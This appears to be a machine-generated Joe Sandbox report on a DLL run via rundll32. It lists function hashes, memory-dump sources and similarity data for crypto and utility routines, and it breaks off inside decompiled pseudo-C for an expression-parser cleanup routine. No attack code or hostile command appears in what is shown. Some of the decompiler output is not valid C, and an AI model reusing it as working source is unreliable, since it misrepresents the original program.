                                                                      • Opcode Fuzzy Hash: cd6924afccd7b87e315566fc0b34ac7627ccdbad5b7df46105264a39c2b01be1
                                                                      • Instruction Fuzzy Hash: 1951F5B1A087419FC744CF29C58451ABBE2FFC8654F56CA2DF889A7350D731ED458B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_encryption_init_info_alloc.F072 ref: 10013562
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_encryption_init_info_alloc
                                                                      • String ID:
                                                                      • API String ID: 3189372936-0
                                                                      • Opcode ID: ef5d398cf4f7091da99b035e9d0245d92d88978e73b2c3d1eb8e068e5064dbea
                                                                      • Instruction ID: 95a8c643b77e51546d68e8d33e3f4ed292e5d24ad01eeb6ce01257d6c0bf5d32
                                                                      • Opcode Fuzzy Hash: ef5d398cf4f7091da99b035e9d0245d92d88978e73b2c3d1eb8e068e5064dbea
                                                                      • Instruction Fuzzy Hash: 2D5128B1A087419FC744CF29C58461AFBE2FFC8654F56C92DE889AB350D731ED428B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_aes_crypt
                                                                      • String ID:
                                                                      • API String ID: 1547198422-0
                                                                      • Opcode ID: a76755bfb4d6463656838ecde433fd04cde547babbb3dbb5163c6ebd5a4d3b10
                                                                      • Instruction ID: 6533aa27bc2eace4d46e94b1d96a72d5c0883edd5f4be066e5c3eb9db2eb8fbd
                                                                      • Opcode Fuzzy Hash: a76755bfb4d6463656838ecde433fd04cde547babbb3dbb5163c6ebd5a4d3b10
                                                                      • Instruction Fuzzy Hash: 81419D3510D7C18FD301CF69848054AFFE1FF99288F198A6DE8D993306D260EA09CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_aes_crypt
                                                                      • String ID:
                                                                      • API String ID: 1547198422-0
                                                                      • Opcode ID: 3928a72eaf0bdf75db777ef61b97453f1547db555a5c878ed5744eb0c7f909a7
                                                                      • Instruction ID: b15eea7d1e62e16a03610dfd725cbd08b0199710858140edd711ee624ae9ea9b
                                                                      • Opcode Fuzzy Hash: 3928a72eaf0bdf75db777ef61b97453f1547db555a5c878ed5744eb0c7f909a7
                                                                      • Instruction Fuzzy Hash: DC31C47610D7C18FD302CB6990C0099FFE1FF99248F198AADE4DD93706D264EA19CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • mv_blowfish_crypt_ecb.F072 ref: 100086C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_blowfish_crypt_ecb
                                                                      • String ID:
                                                                      • API String ID: 997994871-0
                                                                      • Opcode ID: acf8950ea6c148c44c64157bc22eca501f0550abc9d144bf7c67352d16790dd9
                                                                      • Instruction ID: 3ce9d50094e6346554c2820e15aae8c95f0dca09f8e32c6084807ed2f7b375be
                                                                      • Opcode Fuzzy Hash: acf8950ea6c148c44c64157bc22eca501f0550abc9d144bf7c67352d16790dd9
                                                                      • Instruction Fuzzy Hash: 26019DB59093448FC709CF18E48842AFBE0FB8C355F11892EF8CCA7740E774AA448B46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 9%lld
                                                                      • API String ID: 0-1067827528
                                                                      • Opcode ID: 0ad661e65bf89006e5cb82a1dd902ac23a8ed1824c44f0f6cdc208644b3eae13
                                                                      • Instruction ID: 42a7ec19d686179b44da1d5c9b288b2ee9791ca70b21cf781f8aa0d3f756190c
                                                                      • Opcode Fuzzy Hash: 0ad661e65bf89006e5cb82a1dd902ac23a8ed1824c44f0f6cdc208644b3eae13
                                                                      • Instruction Fuzzy Hash: 48615E76A183158FD308DF19D88021AF7E2FBC8710F59892DF998DB351D674EC059B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 9%lld
                                                                      • API String ID: 0-1067827528
                                                                      • Opcode ID: b861221cc90de6241f85d3be745dbcb4f6bcddd84e3623fe88ddccbc427f34d0
                                                                      • Instruction ID: 7f4d39fd12622659375b300fc8b1f39ce51f3fa70086a48383707f29ea88d571
                                                                      • Opcode Fuzzy Hash: b861221cc90de6241f85d3be745dbcb4f6bcddd84e3623fe88ddccbc427f34d0
                                                                      • Instruction Fuzzy Hash: E5517D76A187158FD308DF19D88021AF7E2FBC8710F4A892DE999DB351D774EC059B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *
                                                                      • API String ID: 0-163128923
                                                                      • Opcode ID: ebd0914c98d536ce5320c55f93b04da2ed1618b2e22c755dc20f5b7cb9212f43
                                                                      • Instruction ID: cf0b5ffff515d544aa88b6753479d2fbc1523f17d7230f1051f2f56c5c5a0ce0
                                                                      • Opcode Fuzzy Hash: ebd0914c98d536ce5320c55f93b04da2ed1618b2e22c755dc20f5b7cb9212f43
                                                                      • Instruction Fuzzy Hash: EB414DB6E083514FD340CE29C88021AF7E1EBC8754F5A892EF8D8DB351E674ED418B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d6db034cff99af1e7203ee44394934ffb7567196ced3806a0dc990b907df53bb
                                                                      • Instruction ID: 3bfc1c5f2a162aac7bd0c21019aebd2925a812e4926be9baa0010d95d64e9f74
                                                                      • Opcode Fuzzy Hash: d6db034cff99af1e7203ee44394934ffb7567196ced3806a0dc990b907df53bb
                                                                      • Instruction Fuzzy Hash: 9532503274471D4BC708EEE9DC811D5B3D2BB88614F49813C9E15D3706FBB8BA6A96C8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 33419a9aeb14ce56b4ab0fd1bc83750a17983b722cf78c8c468c2c97687aa838
                                                                      • Instruction ID: 3194deff8c1016480bd4981d57c44dc359412b19884f203e35b39e086724ce96
                                                                      • Opcode Fuzzy Hash: 33419a9aeb14ce56b4ab0fd1bc83750a17983b722cf78c8c468c2c97687aa838
                                                                      • Instruction Fuzzy Hash: D342DE756087409FC754CF29C58099AFBE2BFCE250F16C92EE899C7356D630E942CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e12ceeeddabea2a45ca0b25d6d0e56ab0a323e72b2d12a6fe70e262d570a28b0
                                                                      • Instruction ID: 9772ef97af37772237b7d3f4791e376c52d85cc118ce0e008e01ab5786da6001
                                                                      • Opcode Fuzzy Hash: e12ceeeddabea2a45ca0b25d6d0e56ab0a323e72b2d12a6fe70e262d570a28b0
                                                                      • Instruction Fuzzy Hash: 0002F1719083058FC314CF28D88025ABBF2EFCA344F59896ED8989F356D775D986CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 649db449800bb8f44d4b591db05436e0eed4080366275189c04215ec29e8d69e
                                                                      • Instruction ID: a1783afd4e89d5d45f318d4dea30fc4f4dbee87a7b07b29a2b4422f07ac09f3a
                                                                      • Opcode Fuzzy Hash: 649db449800bb8f44d4b591db05436e0eed4080366275189c04215ec29e8d69e
                                                                      • Instruction Fuzzy Hash: 55E10675B083008FC314CE2CD88060AFBE6BBC9764F598A2DF999D73A1D775E9458B42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cdd2940973defb10da75f7d0a0d281f42e3bf5b71a3b14d95178fa4bbb93f91a
                                                                      • Instruction ID: cfe0db77eb5cf6d1d758d10ab8d8d19e39a375eed658ea468c837abfea5f450e
                                                                      • Opcode Fuzzy Hash: cdd2940973defb10da75f7d0a0d281f42e3bf5b71a3b14d95178fa4bbb93f91a
                                                                      • Instruction Fuzzy Hash: C6D124729083698BC790CE28C88176A77D2EF85310F3A89BDDC95CF346E635E844DB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0fdca86bf5610cf8d83fc9a2a9123c7de6589e9a7e00ce3a8cca6f1a48dd3632
                                                                      • Instruction ID: 8c294614796abfce7a9b313687c0130c20c351539878b9b69ed8c38673feebb7
                                                                      • Opcode Fuzzy Hash: 0fdca86bf5610cf8d83fc9a2a9123c7de6589e9a7e00ce3a8cca6f1a48dd3632
                                                                      • Instruction Fuzzy Hash: 2DA134356002118FD398DE1FD8D0D6A7393ABC432DF5BC26E9E445B3AACD38B4669790
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fb23b611c883a24b7dc64f5ed3ae72e36c28d5f49227ddd76db04b40012c1942
                                                                      • Instruction ID: 5a3567ab1930261374c9840a1c83134747ca7f3c34ec4ff9dc62d8c6c08ad054
                                                                      • Opcode Fuzzy Hash: fb23b611c883a24b7dc64f5ed3ae72e36c28d5f49227ddd76db04b40012c1942
                                                                      • Instruction Fuzzy Hash: 59815172B047019FD308CF19D58161AF7E7ABD8210F5AC43DA999CB3A5DA74E841CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f7460696957a74314385251e6c6bcc12f45c6b26b427e07c74903d9ed9e685e2
                                                                      • Instruction ID: a9fd71970cc6ae0704401159e34ccb1fdaf457640d2c7af12330d1c819c8daf0
                                                                      • Opcode Fuzzy Hash: f7460696957a74314385251e6c6bcc12f45c6b26b427e07c74903d9ed9e685e2
                                                                      • Instruction Fuzzy Hash: 8941B173F2582507E7188828CC05319B2C3DBE4271B1EC37AED59EB789E934ED1686C2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4b52556cb5978d76f0a161bfc99e885d281cec0efd41f06b8f83135470bebe30
                                                                      • Instruction ID: 873dc1b037270df3c72fc734cdf9910190291773d7bcced776bb32a5dc4e00db
                                                                      • Opcode Fuzzy Hash: 4b52556cb5978d76f0a161bfc99e885d281cec0efd41f06b8f83135470bebe30
                                                                      • Instruction Fuzzy Hash: 3081E2745042528FDB94CF29C5C0A96BBE1FF9E310F59C4B9ED988F61AE230A941DF60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 21e1bf70edc85c72b57ecd771a589712a2623989afca4d70576e69868d5c536e
                                                                      • Instruction ID: d243654ff977fd15b0e0421b28be889c9be6cd6a9a899c254bf598e7771c2fe2
                                                                      • Opcode Fuzzy Hash: 21e1bf70edc85c72b57ecd771a589712a2623989afca4d70576e69868d5c536e
                                                                      • Instruction Fuzzy Hash: 0A4174627043329AE314ABEDF4C045EF2E1FE81BA1B874A69D2952F141D230D84DC7EB
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 01961a118ebc83994ce737a496e9055b1f8ab46d9bbd015c8cfe35346e32c7fc
                                                                      • Instruction ID: 6d93bd8323a72235920ba6e149a4a7bae96c73b66a2dfad555009d0c6ff0ce4f
                                                                      • Opcode Fuzzy Hash: 01961a118ebc83994ce737a496e9055b1f8ab46d9bbd015c8cfe35346e32c7fc
                                                                      • Instruction Fuzzy Hash: 5311D2B3F2453203E71CD4199C2136D828387E82B071FC23FDE47A7286EC609D5682D1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: de151643a332339ce823666c471d4da1aa7b144928b0c7d3fd1e004a2c822b77
                                                                      • Instruction ID: 192b5b8e635135c3962563ef613f7b52fce4010c0b042699b34e9086fceffb22
                                                                      • Opcode Fuzzy Hash: de151643a332339ce823666c471d4da1aa7b144928b0c7d3fd1e004a2c822b77
                                                                      • Instruction Fuzzy Hash: 38316F651087D85ECB11CF3544904EABFE09EAB581B09C49EF8E84B247C524EB09EB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c78873d4f70a7114040ce7729ab5ab63925d14f9cd724e7e38f810f9ad5a330b
                                                                      • Instruction ID: 7615e6e647f5862a10f08712ea71b14590be4302af2179b17c0dfb1654340f57
                                                                      • Opcode Fuzzy Hash: c78873d4f70a7114040ce7729ab5ab63925d14f9cd724e7e38f810f9ad5a330b
                                                                      • Instruction Fuzzy Hash: FF2122726042658BCB14DE19C8D86AB73E2FBC9314F168A68E9C55F205C234F84ACBD1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0c76c69a6e16dc7822b4f5a1a757f8ccc5bafd5d8a12991ea2ea248d2ead5663
                                                                      • Instruction ID: 69aa92c53cb6c6df6d72f2decc3ec4bd7719b31d68b56e1e2cf303e831d432a8
                                                                      • Opcode Fuzzy Hash: 0c76c69a6e16dc7822b4f5a1a757f8ccc5bafd5d8a12991ea2ea248d2ead5663
                                                                      • Instruction Fuzzy Hash: 9421BF71A08189EFCB68CF98C8A1A9DBBF5EB09314F244095E905AF751D330EDC1EB55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 123d4edf2cae72c4cb44158153aca10c35860e83f93e9ec1453424ef70596d6d
                                                                      • Instruction ID: bcaa8491dccb865917a35a3d808823525e0e43ff59a73624eea8fea794acadd0
                                                                      • Opcode Fuzzy Hash: 123d4edf2cae72c4cb44158153aca10c35860e83f93e9ec1453424ef70596d6d
                                                                      • Instruction Fuzzy Hash: 141134326041618BCB15CE69C8D86AA73D2FBC9315F17C968E9C69F245C334F94ACBD0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ca7d7dad83a973bb790b37e6832e95b579524e0ac113e1f4aa988c8562b958bd
                                                                      • Instruction ID: f8771a243a862af8759e5689c7b57640d36b1020b076dab7645bd5d8fe9118fc
                                                                      • Opcode Fuzzy Hash: ca7d7dad83a973bb790b37e6832e95b579524e0ac113e1f4aa988c8562b958bd
                                                                      • Instruction Fuzzy Hash: BDF0F676B1435947E900DF459C40B8BB7D9FFC42D8F16052EED48A3305C630BD0586A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • Invalid chars '%s' at the end of expression '%s', xrefs: 1001726C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_mallocz
                                                                      • String ID: Invalid chars '%s' at the end of expression '%s'
                                                                      • API String ID: 1901900789-1422635149
                                                                      • Opcode ID: d35623eb4b68d314ae0af4ba429531c6b924d290049fd1e943cfdb02dea8e5ab
                                                                      • Instruction ID: c3773f839444201a897c0eab6702ce5d2794ca60865343955b286594f26e5f05
                                                                      • Opcode Fuzzy Hash: d35623eb4b68d314ae0af4ba429531c6b924d290049fd1e943cfdb02dea8e5ab
                                                                      • Instruction Fuzzy Hash: E1E182B89097459FC780DFA8D08191ABBF1FF88290F95586DF8C58B312D735E881CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E10017261(void* __eax, void* __ebx, void* __edi, intOrPtr __esi, char _a4, char* _a8, char* _a12, intOrPtr _a16, char _a48, char* _a52, char _a56, char _a60) {
                                                                      				intOrPtr _t116;
                                                                      				void* _t118;
                                                                      				intOrPtr* _t120;
                                                                      
                                                                      				_t116 = __esi;
                                                                      				_a12 = __eax;
                                                                      				__eax = "Invalid chars \'%s\' at the end of expression \'%s\'\n";
                                                                      				__edx = 0x10;
                                                                      				_a8 = "Invalid chars \'%s\' at the end of expression \'%s\'\n";
                                                                      				__eax =  &_a60;
                                                                      				_a16 = __ebx;
                                                                      				_a4 = 0x10;
                                                                      				 *__esp =  &_a60;
                                                                      				__eax = E10026560();
                                                                      				_a48 = __edi;
                                                                      				if(__edi != 0) {
                                                                      					__eax =  *(__edi + 0x18);
                                                                      					_a52 = __eax;
                                                                      					if(__eax != 0) {
                                                                      						__edx = __eax[0x18];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						__edx = __eax[0x1c];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						__edx = __eax[0x20];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
